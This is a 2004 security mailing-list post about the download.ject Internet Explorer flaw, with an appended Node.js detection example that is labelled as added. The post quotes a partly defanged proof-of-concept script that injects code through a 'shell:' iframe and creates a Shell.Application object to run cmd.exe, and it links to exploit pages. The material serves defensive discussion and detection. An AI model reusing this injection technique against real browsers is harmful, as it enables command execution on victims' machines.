Educause Security Discussion mailing list archives
Re: critical Microsoft fix for download.ject
From: Gary Flynn <flynngn () JMU EDU>
Date: Fri, 2 Jul 2004 17:12:32 -0400
Jordan Wiens wrote:
For the first public discovery and analysis of the new exploits (by Jelmer; the author who discovered the original adodb.stream issue), see: http://62.131.86.111/analysis.htm
Note that Jelmer just posted the following to the full disclosure mailing list in reference to this "critical update": (don't follow the link with IE)

******************************************************************
Too bad it won't do you one ounce any good

http://62.131.86.111gf/security/idiots/malware2k/installer.htm

Credit: http-equiv
******************************************************************

gf: Through a series of script calls, it eventually gets to:

********************************************************************
function injectIt() {
  document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<gfscript language="JScript" DEFER>var obj=new ActiveXObject("Shell.Application");obj.ShellExecute("cmd.exe","/c pause");</gfscript>');
}
document.writegf('<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);
**********************************************************************

My limited understanding of the problem makes me suspect that the Shell.Application object is used instead of the ADODB stream object to perform the nasty work after the defect is exploited so don't get comfortable with IE just yet.

--
Gary Flynn
Security Engineer
James Madison University

**********
Participation and subscription information for this EDUCAUSE Discussion Group discussion list can be found at http://www.educause.edu/cg/.
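Added example, not part of the original post or of any code from the people quoted in it: a small content check, runnable under Node.js, showing why a signature keyed only on the ADODB.Stream object name does not see the Shell.Application variant described above, while checks on the surrounding behaviour (a frame with a shell: source, script markup passed to insertAdjacentHTML) still do. The rule names, the two ProgID lists and the sample pages are assumptions constructed for illustration.

```javascript
// Added example: rule names and sample pages are constructed for illustration.
// First list models a signature keyed only on the ADODB.Stream object name.
const PROGIDS_PATCH_ONLY = ["ADODB.Stream"];
const PROGIDS_THREAD = ["ADODB.Stream", "Shell.Application"];

function escapeRe(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

// Return the rule hits for one HTML document, given the ProgIDs to watch for.
function scanPage(html, progids) {
  const hits = [];
  for (const id of progids) {
    // new ActiveXObject("ProgID"): any case, either quote style, optional spaces.
    const re = new RegExp(
      "new\\s+ActiveXObject\\s*\\(\\s*[\"']" + escapeRe(id) + "[\"']\\s*\\)", "i");
    if (re.test(html)) hits.push("activex:" + id);
  }
  // A frame whose src uses the shell: scheme refers to a local resource.
  if (/<i?frame\b[^>]*\bsrc\s*=\s*["']?\s*shell:/i.test(html)) {
    hits.push("frame:shell-scheme");
  }
  // Markup containing a script element passed to insertAdjacentHTML.
  if (/\.insertAdjacentHTML\s*\([^)]*<\s*script\b/i.test(html)) {
    hits.push("inject:script-markup");
  }
  return hits;
}

// Constructed sample modeled on the quoted snippet, truncated so it is inert.
const SAMPLE_SHELL_APP = `
<iframe src="shell:WINDOWS\\\\Web\\\\TIP.HTM"></iframe>
<script>
frames[0].document.body.insertAdjacentHTML('afterBegin',
  '<script DEFER>var obj = new ActiveXObject("Shell.Application");');
</script>`;

// Constructed benign page: ordinary frame and an unrelated ProgID.
const SAMPLE_BENIGN = `
<iframe src="https://example.edu/news.html"></iframe>
<script>var x = new ActiveXObject("Microsoft.XMLHTTP");</script>`;

console.log(scanPage(SAMPLE_SHELL_APP, PROGIDS_PATCH_ONLY));
console.log(scanPage(SAMPLE_SHELL_APP, PROGIDS_THREAD));
console.log(scanPage(SAMPLE_BENIGN, PROGIDS_THREAD));
```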